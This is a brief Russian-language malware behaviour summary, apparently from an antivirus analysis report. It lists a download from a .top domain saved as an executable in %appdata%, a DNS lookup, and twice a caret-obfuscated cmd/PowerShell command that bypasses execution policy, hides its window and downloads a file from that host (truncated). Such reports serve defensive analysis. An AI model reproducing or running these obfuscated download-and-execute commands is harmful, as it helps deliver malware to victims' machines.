Техническая информация
- http://remarksnikersbounty.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWe^R^shEl^l.EXE -^ExEC^u^t^iO^n^POlI^cY ^BY^p^ASs -NoPr^o^fILE ^-wi^ndOwst^yLe hidd^E^N ^(^N^ew-^objeCT SYs^TE^M.^N^ET.w^ebc^L^iEN^t).d^ownLoAd^F^i^le^('http://remarksnikersbounty...
- DNS ASK re#####nikersbounty.top
- '<SYSTEM32>\cmd.exe' /C "pOWe^R^shEl^l.EXE -^ExEC^u^t^iO^n^POlI^cY ^BY^p^ASs -NoPr^o^fILE ^-wi^ndOwst^yLe hidd^E^N ^(^N^ew-^objeCT SYs^TE^M.^N^ET.w^ebc^L^iEN^t).d^ownLoAd^F^i^le^('http://remarksnikersbounty...' (со скрытым окном)